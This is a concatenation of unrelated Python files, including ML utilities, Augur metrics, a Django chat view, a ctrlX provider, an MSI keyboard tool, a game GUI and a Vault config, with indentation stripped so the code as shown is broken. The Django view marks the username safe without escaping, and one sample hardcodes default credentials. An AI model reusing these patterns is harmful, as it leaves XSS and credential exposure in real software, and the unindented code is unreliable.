new_transition = np.where(np.isnan(new_transition), np.eye(self.num_states), new_transition)
new_projection = np.where(np.isnan(new_projection), 1.0 / self.num_outputs, new_projection)
return DiscreteHiddenMM(mc.MarkovChain(new_initial_distribution, new_transition), new_projection)
else:
return self
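# Hedged usage sketch (not part of the original module). The MarkovChain constructor
# signature (initial distribution, transition matrix) is inferred from fit_single()
# above; all numbers below are illustrative:
#   chain = mc.MarkovChain(np.array([0.6, 0.4]),
#                          np.array([[0.7, 0.3],
#                                    [0.2, 0.8]]))
#   hmm = DiscreteHiddenMM(chain, np.array([[0.9, 0.1],
#                                           [0.3, 0.7]]))
#   observations = np.array([0, 1, 1, 0])
#   hmm.log_likelihood(observations)     # scalar log P(observations | model)
#   hmm.solve_for_states(observations)   # most probable hidden state sequence (Viterbi)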
|
"""
Metrics that provide data about with insight detection and reporting
"""
import datetime
import sqlalchemy as s
import pandas as pd
from augur.util import logger, annotate, add_metrics
@annotate(tag='top-insights')
def top_insights(self, repo_group_id, num_repos=6):
"""
    Returns the top insights (detected metric anomalies) for up to num_repos repositories in the given repo group
:return: DataFrame with top insights across all repos
"""
topInsightsSQL = s.sql.text("""
SELECT rg_name, repo.repo_group_id, repo_insights.repo_id, repo_git, ri_metric, ri_field, ri_value AS value,
ri_date AS date, ri_fresh AS discovered
FROM repo_insights JOIN repo ON repo.repo_id = repo_insights.repo_id JOIN repo_groups ON repo.repo_group_id = repo_groups.repo_group_id
WHERE repo_insights.repo_id IN (
SELECT repo_id
FROM repo
WHERE repo_group_id = :repo_group_id
AND repo_id IN (SELECT repo_id FROM repo_insights GROUP BY repo_id, ri_id HAVING 304 > count(repo_insights.repo_id) ORDER BY ri_id desc)
LIMIT :num_repos
)
""")
results = pd.read_sql(topInsightsSQL, self.database, params={'repo_group_id': repo_group_id, 'num_repos': num_repos})
return results
@annotate(tag='testing-coverage')
def testing_coverage(self, repo_group_id, repo_id=None, period='day', begin_date=None, end_date=None):
"""
        Analyzes how much a repository is tested.
        :parameter repo_group_id: The repository’s group id
        :return: DataFrame of testing coverage for a repository
"""
if not begin_date:
begin_date = '1970-1-1 00:00:00'
if not end_date:
end_date = datetime.datetime.now().strftime('%Y-%m-%d %H:%M')
if not repo_id:
testing_coverage_SQL = s.sql.text("""
SELECT
repo_test_coverage.repo_id,
repo_test_coverage.file_subroutines_tested,
repo_test_coverage.file_subroutine_count,
repo_test_coverage.file_statements_tested,
repo_test_coverage.file_statement_count
FROM augur_data.repo_test_coverage JOIN augur_data.repo on repo_test_coverage.repo_id in (SELECT repo_id
FROM augur_data.repo
WHERE repo_group_id = :repo_group_id)
GROUP BY repo_test_coverage.repo_id
""")
results = pd.read_sql(testing_coverage_SQL, self.database, params={'repo_group_id': repo_group_id, 'period': period, 'begin_date': begin_date, 'end_date': end_date})
# output the testing coverage as percentages, one for subroutines tested and one for statements tested
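        # Hedged sketch of how those percentages could be derived from the columns
        # returned above (not implemented in the original; column names come from the
        # SQL query):
        #   results['subroutine_coverage'] = (results['file_subroutines_tested']
        #                                     / results['file_subroutine_count'])
        #   results['statement_coverage'] = (results['file_statements_tested']
        #                                    / results['file_statement_count'])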
return results
else:
testing_coverage_SQL = s.sql.text("""
SELECT
augur_data.repo_test_coverage.file_subroutines_tested,
augur_data.repo_test_coverage.file_subroutine_count,
augur_data.repo_test_coverage.file_statements_tested,
augur_data.repo_test_coverage.file_statement_count
FROM augur_data.repo_test_coverage JOIN augur_data.repo on repo_test_coverage.repo_id in (SELECT repo_id
FROM augur_data.repo
                WHERE repo_id = :repo_id)
GROUP BY augur_data.repo_test_coverage.repo_id
""")
results = pd.read_sql(testing_coverage_SQL, self.database, params={'repo_id': repo_id, 'period': period, 'begin_date': begin_date, 'end_date': end_date})
# same as above for outputting percentages
return results
def create_insight_metrics(metrics):
add_metrics(metrics, __name__)
|
#!/usr/bin/env python
#
# entp_plots.py
#
import matplotlib.pyplot as plt
import numpy as np
fig = plt.figure()
# Reading data
ent = (np.loadtxt('t-fixed-2.0.DAT')).T
plt.xlabel(r'$t \Delta$')
plt.ylabel(r'$\sigma(t)$', rotation='horizontal')
plt.plot(ent[0], ent[1], 'y-')
plt.grid(True)
plt.show()
|
import numpy as np
import scipy.io as sio
np.random.seed(0)
VGG_MEAN = [103.939, 116.779, 123.68]
def read_mat(path):
return np.load(path)
def write_mat(path, m):
np.save(path, m)
def read_ids(path):
return [line.rstrip('\n') for line in open(path)]
class Batch_Feeder:
def __init__(self, dataset, indices, train, batchSize, padWidth, padHeight, flip=False, keepEmpty=False):
self._epochs_completed = 0
self._index_in_epoch = 0
self._dataset = dataset
self._indices = indices
self._train = train
self._batchSize = batchSize
self._padWidth = padWidth
self._padHeight = padHeight
self._flip = flip
self._keepEmpty = keepEmpty
def set_paths(self, idList=None, gtDir=None, ssDir=None):
self._paths = []
if self._train:
for id in idList:
if self._dataset == "kitti":
self._paths.append([id, gtDir+'/'+id+'.mat', ssDir+'/'+id+'.mat'])
elif self._dataset == "cityscapes" or self._dataset == "pascal":
self._paths.append([id,
gtDir + '/' + id + '_unified_GT.mat',
ssDir + '/' + id + '_unified_ss.mat'])
else:
for id in idList:
if self._dataset == "kitti":
self._paths.append([id, ssDir+'/'+id+'.mat'])
elif self._dataset == "cityscapes" or self._dataset == "pascal":
self._paths.append([id,
ssDir + '/' + id + '_unified_ss.mat'])
self._numData = len(self._paths)
assert self._batchSize < self._numData
def shuffle(self):
np.random.shuffle(self._paths)
def next_batch(self):
idBatch = []
dirBatch = []
gtBatch = []
ssBatch = []
weightBatch = []
if self._train:
while (len(idBatch) < self._batchSize):
ss = (sio.loadmat(self._paths[self._index_in_epoch][2])['mask']).astype(float)
ss = np.sum(ss[:,:,self._indices], 2)
if ss.sum() > 0 or self._keepEmpty:
idBatch.append(self._paths[self._index_in_epoch][0])
dir = (sio.loadmat(self._paths[self._index_in_epoch][1])['dir_map']).astype(float)
gt = (sio.loadmat(self._paths[self._index_in_epoch][1])['depth_map']).astype(float)
weight = (sio.loadmat(self._paths[self._index_in_epoch][1])['weight_map']).astype(float)
dirBatch.append(self.pad(dir))
gtBatch.append(self.pad(gt))
weightBatch.append(self.pad(weight))
ssBatch.append(ss)
self._index_in_epoch += 1
if self._index_in_epoch == self._numData:
self._index_in_epoch = 0
self.shuffle()
dirBatch = np.array(dirBatch)
gtBatch = np.array(gtBatch)
ssBatch = np.array(ssBatch)
weightBatch = np.array(weightBatch)
if self._flip and np.random.uniform() > 0.5:
for i in range(len(dirBatch)):
for j in range(2):
dirBatch[i,:,:,j] = np.fliplr(dirBatch[i,:,:,j])
dirBatch[i, :, :, 0] = -1 * dirBatch[i, :, :, 0]
ssBatch[i] = np.fliplr(ssBatch[i])
gtBatch[i] = np.fliplr(gtBatch[i])
weightBatch[i] = np.fliplr(weightBatch[i])
return dirBatch, gtBatch, weightBatch, ssBatch, idBatch
else:
for example in self._paths[self._index_in_epoch:min(self._index_in_epoch + self._batchSize, self._numData)]:
dirBatch.append(self.pad((sio.loadmat(example[1])['dir_map']).astype(float)))
idBatch.append(example[0])
ss = (sio.loadmat(example[2])['mask']).astype(float)
ss = np.sum(ss[:, :, self._indices], 2)
ssBatch.append(self.pad(ss))
# imageBatch = np.array(imageBatch)
dirBatch = np.array(dirBatch)
ssBatch = np.array(ssBatch)
# return imageBatch, dirBatch, ssBatch, idBatch
self._index_in_epoch += self._batchSize
return dirBatch, ssBatch, idBatch
def total_samples(self):
return self._numData
def image_scaling(self, rgb_scaled):
# if self._dataset == "cityscapes":
# rgb_scaled = skimage.transform.pyramid_reduce(rgb_scaled, sigma=0.001)
#rgb_scaled = skimage.transform.rescale(rgb_scaled, 0.5)
rgb_scaled[:,:,0] = (rgb_scaled[:,:,0] - VGG_MEAN[0])/128
rgb_scaled[:,:,1] = (rgb_scaled[:,:,1] - VGG_MEAN[1])/128
rgb_scaled[:,:,2] = (rgb_scaled[:,:,2] - VGG_MEAN[2])/128
return rgb_scaled
        # Unreachable legacy code below (kept for reference): it would convert RGB to BGR,
        # but `tf` is never imported in this module, so the call is left commented out.
        # red, green, blue = tf.split(3, 3, rgb_scaled)
# assert red.get_shape().as_list()[1:] == [224, 224, 1]
# assert green.get_shape().as_list()[1:] == [224, 224, 1]
# assert blue.get_shape().as_list()[1:] == [224, 224, 1]
#bgr = tf.concat(3, [
# blue - VGG_MEAN[0],
# green - VGG_MEAN[1],
# red - VGG_MEAN[2],
#])
# assert bgr.get_shape().as_list()[1:] == [224, 224, 3]
def pad(self, data):
if self._padHeight and self._padWidth:
if data.ndim == 3:
npad = ((0,self._padHeight-data.shape[0]),(0,self._padWidth-data.shape[1]),(0,0))
elif data.ndim == 2:
npad = ((0, self._padHeight - data.shape[0]), (0, self._padWidth - data.shape[1]))
padData = np.pad(data, npad, mode='constant', constant_values=0)
else:
padData = data
return padData
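# Hedged usage sketch (not part of the original module); the id list and directory
# paths are hypothetical placeholders:
#   feeder = Batch_Feeder(dataset="cityscapes", indices=[0, 1], train=True,
#                         batchSize=4, padWidth=2048, padHeight=1024, flip=True)
#   feeder.set_paths(idList=read_ids("train_ids.txt"), gtDir="gt_dir", ssDir="ss_dir")
#   feeder.shuffle()
#   dirBatch, gtBatch, weightBatch, ssBatch, idBatch = feeder.next_batch()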
|
import unittest
from lib.models import *
from lib.generator import RandomFiller
class TestGameModels(unittest.TestCase):
randomFiller = RandomFiller()
def test_player_generator(self):
pl = self.randomFiller.get_player()
self.assertIsInstance(pl, Player)
self.assertIsNotNone(pl.name)
self.assertIsNotNone(pl.role)
def test_team_generator(self):
team = self.randomFiller.get_team()
self.assertIsNot(len(team.players), 0)
self.assertIsNotNone(team.coach)
self.assertIsNotNone(team.get_avg_age())
self.assertIsNotNone(team.get_avg_skill())
if __name__ == '__main__':
unittest.main()
|
#! /usr/bin/env python
# -*- coding: utf-8 -*-
import rg
class Robot:
def act(self, game):
        # if you are at the center, defend
if self.location == rg.CENTER_POINT:
return ['guard']
        # if there are enemies nearby, attack
for poz, robot in game.robots.iteritems():
if robot.player_id != self.player_id:
if rg.dist(poz, self.location) <= 1:
return ['attack', poz]
        # move toward the center of the board
return ['move', rg.toward(self.location, rg.CENTER_POINT)]
|
from django.shortcuts import render, redirect
from django.http import HttpResponse
from django.utils.safestring import mark_safe
from django.contrib.auth.decorators import login_required
import json
# Create your views here.
def index(request):
return render(request, 'index.html',{})
@login_required
def room(request, room_name):
return render(request, 'room.html', {
'room_name': room_name,
'username': mark_safe(json.dumps(request.user.username)),
})
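# Hedged sketch (not part of the original app): a matching urls.py would typically
# route to these views, e.g.
#   from django.urls import path
#   from . import views
#   urlpatterns = [
#       path('', views.index, name='index'),
#       path('<str:room_name>/', views.room, name='room'),
#   ]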
|
# MIT License
#
# Copyright (c) 2020, Bosch Rexroth AG
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
import os
import sys
import signal
import time
import datalayer
import datalayerprovider.my_provider_node
connectionProvider = "tcp://boschrexroth:[email protected]:2070"
def run_provider(provider : datalayer.provider.Provider):
print("Starting provider...")
provider_node = datalayerprovider.my_provider_node.MyProviderNode()
with datalayer.provider_node.ProviderNode(provider_node.cbs, 1234) as node:
result = provider.register_node("myData/myString", node)
if result != datalayer.variant.Result.OK:
print("Register Data Provider failed with: ", result)
result= provider.start()
if result != datalayer.variant.Result.OK:
print("Starting Provider failed with: ", result)
print("Provider started...")
print("Running endless loop...")
count=0
while True:
count=count+1
if count > 9:
break
time.sleep(1)
result = provider.stop()
if result != datalayer.variant.Result.OK:
print("Stopping Provider failed with: ", result)
result = provider.unregister_node("myData/myString")
if result != datalayer.variant.Result.OK:
print("Unregister Data Provider failed with: ", result)
def run():
print("Simple Snap for ctrlX Datalayer Provider with Python")
print("Connect to ctrlX CORE: ", connectionProvider)
print("Create and start ctrlX Datalayer System")
with datalayer.system.System("") as datalayer_system:
datalayer_system.start(False)
print("Creating provider...")
with datalayer_system.factory().create_provider(connectionProvider) as provider:
run_provider(provider)
datalayer_system.stop(True)
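# Hedged usage note (not part of the original file): as a snap entry point this module
# would typically be executed via run(), e.g.
#   if __name__ == '__main__':
#       run()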
|
meuCartao = int(input("Digite o número do cartão de crédito: "))
cartaolido = 1
encontreiMeuCartaoNaLista = False
while cartaolido != 0 and not encontreiMeuCartaoNaLista:
cartaolido = int(input("Digite o número do próximo cartão de crédito: "))
if cartaolido == meuCartao:
encontreiMeuCartaoNaLista = True
if encontreiMeuCartaoNaLista:
print("Encontrei!!!")
else:
print("Não encontrei :(") |
"""Evaluate model and calculate results for SMP-CAIL2020-Argmine.
Author: Tsinghuaboy [email protected]
"""
from typing import List
import codecs
import pandas
import torch
from tqdm import tqdm
from sklearn import metrics
# from classmerge import classy_dic, indic
LABELS = [0,1]
threshold = 0.8
def calculate_accuracy_f1(
golds: List[str], predicts: List[str]) -> tuple:
"""Calculate accuracy and f1 score.
Args:
golds: answers
predicts: predictions given by model
Returns:
accuracy, f1 score
"""
return metrics.accuracy_score(golds, predicts), \
metrics.f1_score(
golds, predicts,
labels=LABELS, average='macro')
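# Hedged worked example (illustrative only): for golds [1, 0, 1, 1] and predicts
# [1, 0, 0, 1], accuracy is 3/4 = 0.75 and the macro F1 over LABELS [0, 1] is
# (0.667 + 0.8) / 2 = 0.733 (approximately), so calculate_accuracy_f1 returns
# roughly (0.75, 0.733).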
# def get_labels_from_file(filename):
# """Get labels on the last column from file.
#
# Args:
# filename: file name
#
# Returns:
# List[str]: label list
# """
# labels = []
# with codecs.open(filename, 'r', encoding='utf-8') as fin:
# fin.readline()
# for line in fin:
# labels.append(line.strip().split(',')[-1])
# return labels
def get_labels_from_file(filename):
"""Get labels on the last column from file.
Args:
filename: file name
Returns:
List[str]: label list
"""
data_frame = pandas.read_csv(filename)
labels = data_frame['summary'].tolist()
return labels
def eval_file(golds_file, predicts_file):
"""Evaluate submission file
Args:
golds_file: file path
predicts_file: file path
Returns:
accuracy, f1 score
"""
golds = get_labels_from_file(golds_file)
predicts = get_labels_from_file(predicts_file)
return calculate_accuracy_f1(golds, predicts)
def evaluate(model, data_loader, device) -> List[str]:
"""Evaluate model on data loader in device.
Args:
model: model to be evaluate
data_loader: torch.utils.data.DataLoader
device: cuda or cpu
Returns:
answer list
"""
model.eval()
input_ids = torch.tensor([], dtype=torch.long).to(device)
outputs = torch.tensor([], dtype=torch.float).to(device)
# segment = torch.tensor([], dtype=torch.long).to(device)
for batch in tqdm(data_loader, desc='Evaluation', ncols=80):
batch = tuple(t.to(device) for t in batch)
with torch.no_grad():
logits = model(*batch)
outputs = torch.cat([outputs, logits[:, :]])
input_ids = torch.cat([input_ids, batch[0][:, :]])
# segment = torch.cat([segment, batch[-1][:, :]])
output_ids = []
output_tokens = []
for i in range(len(outputs)):
        if threshold == 1:
            top_positions = range(len(outputs[i]))
        else:
            top_positions = torch.topk(outputs[i], int(len(outputs[i]) * threshold), sorted=False, largest=True)[1]
        # bits = outputs[i].data.cpu().numpy().round()
        output_id = []
        for j in top_positions:
if input_ids[i][j]:
output_id.append(input_ids[i][j])
output_ids.append(output_id)
# output_tokens.append(model.bert.convert_ids_to_tokens(output_id))
#
# segment_tokens = []
# for i in range(len(segment)):
# if segment[i] > len(segment_tokens):
# segment_tokens.append("")
# segment_tokens[segment[i]] += output_tokens[i]
# answer_list = []
# predict_support_np = torch.sigmoid(outputs).data.cpu().numpy()
# for i in range(predict_support_np.shape[0]):
# left_ids = []
# for j in range(predict_support_np.shape[1]):
# if predict_support_np[i, j] > 0.5:
# left_ids.append(input_ids[i,j])
# answer_list.append(left_ids)
#
# for i in range(len(outputs)):
# logits = outputs[i]
# answer = int(torch.argmax(logits, dim=-1))
# answer_list.append(answer)
return output_ids
if __name__ == '__main__':
acc, f1_score = eval_file(
'data/train.csv', 'rule_baseline/submission.csv')
print("acc: {}, f1: {}".format(acc, f1_score))
|
#!/usr/bin/env python
import argparse
import logging
import os
import sys
import gi
gi.require_version("Gtk", "3.0")
gi.require_version("Gdk", "3.0")
from .config import load_steady, ConfigError
from .gui_handlers import SetupHandler, ConfigHandler
from .msikeyboard import MSIKeyboard, UnknownModelError
from .parsing import (
parse_usb_id,
parse_preset,
UnknownIdError,
UnknownPresetError,
)
from gi.repository import Gtk
__version__ = "3.0"
DEFAULT_ID = "1038:1122"
DEFAULT_MODEL = "GP75" # Default laptop model if nothing specified
logging.basicConfig()
logging.getLogger().setLevel(logging.INFO)
log = logging.getLogger(__name__)
def run_gui(model, colors_filename, usb_id, setup=False):
builder = Gtk.Builder()
builder.add_from_file(os.path.join(os.path.dirname(__file__), "ui.glade"))
kb_image = builder.get_object("kb_image")
color_selector = builder.get_object("color_selector")
if setup:
h = SetupHandler(model, kb_image)
else:
h = ConfigHandler(
model,
kb_image,
color_selector,
colors_filename,
usb_id,
)
builder.connect_signals(h)
window = builder.get_object("GtkWindow")
window.set_title(f"{model} Keyboard {__version__}")
window.show_all()
Gtk.main()
def main():
parser = argparse.ArgumentParser(
description="Tool to control per-key RGB keyboard backlighting on MSI laptops. https://github.com/Askannz/msi-perkeyrgb"
)
parser.add_argument(
"-v", "--version", action="store_true", help="Prints version and exits."
)
parser.add_argument(
"-c",
"--config",
action="store",
metavar="FILEPATH",
help='Loads the configuration file located at FILEPATH. Refer to the README for syntax. If set to "-", '
"the configuration file is read from the standard input (stdin) instead.",
default="config.msic",
)
parser.add_argument(
"-d", "--disable", action="store_true", help="Disable RGB lighting."
)
parser.add_argument(
"--id",
action="store",
metavar="VENDOR_ID:PRODUCT_ID",
help="This argument allows you to specify the vendor/product id of your keyboard. "
"You should not have to use this unless opening the keyboard fails with the default value. "
"IDs are in hexadecimal format (example : 1038:1122)",
)
parser.add_argument(
"--list-presets",
action="store_true",
help="List available presets for the given laptop model.",
)
parser.add_argument(
"-p", "--preset", action="store", help="Use vendor preset (see --list-presets)."
)
parser.add_argument(
"-m",
"--model",
action="store",
help="Set laptop model (see --list-models). If not specified, will use %s as default."
% DEFAULT_MODEL,
)
parser.add_argument(
"--list-models", action="store_true", help="List available laptop models."
)
parser.add_argument("--setup", action="store_true", help="Open app in setup mode.")
parser.add_argument(
"-s",
"--steady",
action="store",
metavar="HEXCOLOR",
help="Set all of the keyboard to a steady html color. ex. 00ff00 for green",
)
args = parser.parse_args()
if args.version:
print("Version: %s" % __version__)
sys.exit(1)
if args.list_models:
print("Available laptop models are :")
for msi_models, _ in MSIKeyboard.available_msi_keymaps:
for model in msi_models:
print(model)
print(
"\nIf your laptop is not in this list, use the closest one "
"(with a keyboard layout as similar as possible). "
"This tool will only work with per-key RGB models."
)
sys.exit(1)
# Parse laptop model
if not args.model:
print("No laptop model specified, using %s as default." % DEFAULT_MODEL)
msi_model = DEFAULT_MODEL
else:
try:
msi_model = MSIKeyboard.parse_model(args.model)
except UnknownModelError:
print("Unknown MSI model : %s" % args.model)
sys.exit(1)
# Parse USB vendor/product ID
if not args.id:
usb_id = parse_usb_id(DEFAULT_ID)
else:
try:
usb_id = parse_usb_id(args.id)
except UnknownIdError:
print("Unknown vendor/product ID : %s" % args.id)
sys.exit(1)
# Loading presets
msi_presets = MSIKeyboard.get_model_presets(msi_model)
if args.list_presets:
if msi_presets == {}:
print("No presets available for %s." % msi_model)
else:
print("Available presets for %s:" % msi_model)
for preset in msi_presets.keys():
print("\t- %s" % preset)
sys.exit(1)
# Loading keymap
msi_keymap = MSIKeyboard.get_model_keymap(msi_model)
# Loading keyboard
kb = MSIKeyboard.get(usb_id, msi_keymap, msi_presets)
if not kb:
sys.exit(1)
# If user has requested disabling
if args.disable:
kb.set_color_all([0, 0, 0])
kb.refresh()
sys.exit(1)
# If user has requested a preset
elif args.preset:
try:
preset = parse_preset(args.preset, msi_presets)
except UnknownPresetError:
print(
f"Preset {args.preset} not found for model {msi_model}. "
f"Use --list-presets for available options"
)
sys.exit(1)
kb.set_preset(preset)
kb.refresh()
sys.exit(1)
# If user has requested to display a steady color
elif args.steady:
try:
colors_map, warnings = load_steady(args.steady, msi_keymap)
except ConfigError as e:
print("Error preparing steady color : %s" % str(e))
sys.exit(1)
kb.set_colors(colors_map)
kb.refresh()
sys.exit(1)
# If user has not requested anything
else:
if not os.path.isfile(args.config):
with open(args.config, "w") as i:
with open(
os.path.join(os.path.dirname(__file__), "configs", "default.msic")
) as o:
print(
f"Config file {args.config} not found, new created from default"
)
i.write(o.read())
run_gui(msi_model, args.config, usb_id, args.setup)
if __name__ == "__main__":
main()
|
from ai import AIPlayer
import tkinter as tk # GUI
from logika import *
from minimax import *
from clovek import Clovek
from racunalnik import Racunalnik
##################################
# GRAPHICAL / USER INTERFACE     #
##################################
MIN_SIRINA = 500
MIN_VISINA = 555
ZVP = 100
class Gui:
    # Define tags for the canvas elements
    TAG_FIGURA = "figura" # players' pieces
    TAG_OKVIR = "okvir" # lines that form the playing surface / its frame
    TAG_GUMB = "gumb" # buttons
    TAG_PETKA = "petka" # the winning five-in-a-row
    BARVE = {IGRALEC_1: "red", IGRALEC_2: "blue"} # player colors
def __init__(self, master):
        self.igralec_1 = None # Object playing PLAYER 1
        self.igralec_2 = None # Object playing PLAYER 2
        self.igra = None # Object representing the game
        self.velikost_polja = ZVP # Cell size
        self.velikost_gap = self.velikost_polja / 20 # Gap between the frame and a piece
        # When the user closes the window, self.zapri_okno should be called
master.protocol("WM_DELETE_WINDOW", lambda: self.zapri_okno(master))
        # Main menu
menu = tk.Menu(master)
master.config(menu=menu)
        # Game submenu
menu_igra = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Igra", menu=menu_igra)
        # Button to start a new game
menu_igra.add_command(label="Nova igra",
command=self.zacni_igro)
        # Options submenu
menu_moznosti = tk.Menu(menu, tearoff=0)
menu.add_cascade(label="Moznosti", menu=menu_moznosti)
        ####################
        # PLAYING SURFACE  #
        ####################
self.platno = tk.Canvas(master,
width=(NUM_COLS+1) * self.velikost_polja,
height=(NUM_ROWS+1) * self.velikost_polja)
self.platno.pack(fill=tk.BOTH, expand=1, side=tk.RIGHT)
        # Draw the grid lines
self.narisi_okvir()
        # Define what the user's clicks do
self.platno.bind("<Button-1>", self.platno_klik)
        # Start the game
self.zacni_igro()
def zapri_okno(self, master):
        '''Called when the user closes the application.'''
        # Stop the players first
        self.prekini_igralce()
        # Close the window
master.destroy()
def prekini_igralce(self):
        '''Tells the players to stop thinking.'''
if self.igralec_1:
self.igralec_1.prekini()
if self.igralec_2:
self.igralec_2.prekini()
def narisi_okvir(self):
        '''Draws the frame of the playing surface.'''
self.platno.delete(Gui.TAG_OKVIR)
d = self.velikost_polja
xmin = d/2
xmax = xmin + NUM_COLS * d
ymin = d/2
ymax = ymin + NUM_ROWS * d
for i in range(NUM_ROWS+1):
self.platno.create_line(xmin, ymin + i*d, xmax, ymin + i*d)
for i in range(NUM_COLS+1):
self.platno.create_line(xmin + i*d, ymin, xmin + i*d, ymax)
def platno_klik(self, event):
x,y = event.x, event.y
d = self.velikost_polja
if (x < d/2) or (x > d/2 + NUM_COLS * d) or (y < d/2) or (y > d/2 + NUM_ROWS * d):
            # Click is outside the playing surface
return
else:
            col = int((x-d/2) // d) # Which column was clicked
            p = col + 1 # The move, up to its sign
row = NUM_ROWS - 1 - int((y-d/2) // d)
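            # Hedged reading of the branches below (inferred from the code, not stated in
            # the original): the sign of p encodes the drop direction - a positive move
            # number places the piece on the stack growing from the bottom of the column,
            # a negative one on the stack growing from the top; the clicked cell must sit
            # directly on top of the corresponding stack (or be its first cell).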
if self.igra.board[col][row] != PRAZNO:
                # The cell is already occupied
return
elif row == 0:
pass
elif row == NUM_ROWS - 1:
p *= -1
elif self.igra.board[col][row-1] != PRAZNO:
pass
elif self.igra.board[col][(row+1) % NUM_ROWS] != PRAZNO:
p *= -1
# print("Poteza:", p)
            # Ask the player to play the clicked move
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.klik(p)
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.klik(p)
def povleci_potezo(self, p):
        '''Plays and draws the move.'''
igralec = self.igra.na_potezi
zmagovalec, petka = self.igra.odigraj_potezo(p)
if zmagovalec is None:
            # The move is not valid
return
self.narisi_potezo(p, Gui.BARVE[igralec])
if zmagovalec == NI_KONEC:
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.igraj()
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.igraj()
else:
self.koncaj_igro(zmagovalec, petka)
def narisi_potezo(self, p, col):
d = self.velikost_polja
x = abs(p) - 1
y = self.igra.vrstice_plus[x] - 1 if p>0 else -(self.igra.vrstice_minus[x]) % NUM_ROWS
xcenter = (x+1) * d
ycenter = (NUM_ROWS-y) * d
gap = self.velikost_gap
self.platno.create_oval(xcenter-d/2+gap, ycenter-d/2+gap,
xcenter+d/2-gap, ycenter+d/2-gap,
fill=col,
width=0,
tag=Gui.TAG_FIGURA)
self.platno.create_text(xcenter, ycenter,
text=str(self.igra.stevilo_potez),
font=("Purisa", 40),
tag=Gui.TAG_FIGURA)
def obarvaj_petko(self, petka, col):
d = self.velikost_polja
for x,y in petka:
ycoord = NUM_ROWS-1-y
self.platno.create_rectangle(d/2 + x*d, d/2 + ycoord*d,
d/2 + (x+1)*d, d/2 + (ycoord+1)*d,
outline=col,
width=4,
tag=Gui.TAG_PETKA)
def zacni_igro(self):
        '''Starts a new/next game. Sets up the players, game type, score, etc.'''
self.prekini_igralce()
self.igralec_1 = Clovek(self)
# self.igralec_2 = Clovek(self)
# self.igralec_1 = Racunalnik(self, AIPlayer("ai", 0, 0.9, 0.1))
# self.igralec_1.algoritem.nalozi_strategijo("ai_100k_p1")
# self.igralec_1 = Racunalnik(self, Minimax(4, "alphabeta"))
self.igralec_2 = Racunalnik(self, Minimax(4, "negamax_memo"))
# # self.igralec_1.algoritem.vrednost_polozaja = self.igralec_1.algoritem.vrednost_polozaja_old
# self.igralec_2.algoritem.vrednost_polozaja = self.igralec_2.algoritem.vrednost_polozaja_old
# self.igralec_1.algoritem.bias = 1
        # Clear the played moves
self.platno.delete(Gui.TAG_FIGURA)
self.platno.delete(Gui.TAG_PETKA)
        # Create a new game
self.igra = Logika()
        # Check whose turn it is
if self.igra.na_potezi == IGRALEC_1:
self.igralec_1.igraj()
elif self.igra.na_potezi == IGRALEC_2:
self.igralec_2.igraj()
def koncaj_igro(self, zmagovalec, petka):
if petka is not None:
self.obarvaj_petko(petka, Gui.BARVE[zmagovalec])
######################################################################
## Main program
if __name__ == "__main__":
    # Create the main window and set its title
root = tk.Tk()
root.title("Pet v vrsto")
    # Set the minimum window size
root.minsize(int(MIN_SIRINA), int(MIN_VISINA))
    # Create the Gui object and keep a reference to it, otherwise Python garbage-collects it
aplikacija = Gui(root)
    # Hand control over to the main window
    # The mainloop function returns once the window is closed
root.mainloop() |
#!/usr/bin/python
config = [
# enable ldap
{
"/v1/sys/auth/ldap": {
"type": "ldap",
"description": "Login with ldap"
}
},
# configure ldap
{
"/v1/auth/ldap/config": {
"url": "ldap://[myldapserver].net",
"binddn": "cn=[myadminuser],dc=[mydomain],dc=net",
"userdn": "ou=People,dc=[mydomain],dc=net",
"userattr": "uid",
"groupdn": "ou=Group,dc=[mydomain],dc=net",
"groupattr": "cn",
"insecure_tls": "false"
}
},
# enable audit
{
"/v1/sys/audit/file": {
"type": "file",
"description": "enable audit type file",
"options": {
"path": "/storage/data/vault/log/vault_audit.log"
}
}
},
# create policies
{
"/v1/sys/policies/acl/system_admins": {
"policy": {
"path": {
"secret/*": { "capabilities": [ "create", "read", "list", "update" ] },
"policy/*": { "capabilities": [ "create", "read", "list", "update" ] },
"auth/*": { "capabilities": [ "create", "read", "list", "update" ] },
"mount/*": { "capabilities": [ "create", "read", "list", "update" ] }
}
}
}
},
{
"/v1/sys/policies/acl/system_admins_ro": {
"policy": {
"path": {
"secret/*": { "capabilities": [ "read", "list" ] },
"auth/*": { "capabilities": [ "read", "list" ] },
}
}
}
},
# assign policy to ldap group
{ "/v1/auth/ldap/groups/system_admins":
{ "policies": "system_admins",
}
},
{ "/v1/auth/ldap/groups/system_admins_ro":
{ "policies": "system_admins_ro",
}
},
]
approle = [
{
"app": {
"path": [ "secret/prod/app/*", "secret/prod/app_alt/*" ]
}
},
{
"app_dev": {
"path": [ "secret/dev/app/*" ]
}
}
]
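# A minimal sketch (illustrative only) of how the path -> payload entries above could be
# pushed to a Vault server over its HTTP API.  The VAULT_ADDR / VAULT_TOKEN environment
# variables and the use of the `requests` library are assumptions, not part of this file.
if __name__ == "__main__":
    import os
    import requests
    vault_addr = os.environ.get("VAULT_ADDR", "http://127.0.0.1:8200")
    headers = {"X-Vault-Token": os.environ["VAULT_TOKEN"]}
    for entry in config:
        for path, payload in entry.items():
            # each key is an API path (e.g. /v1/sys/auth/ldap), each value the JSON body
            resp = requests.post(vault_addr + path, json=payload, headers=headers)
            print(path, resp.status_code)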
|
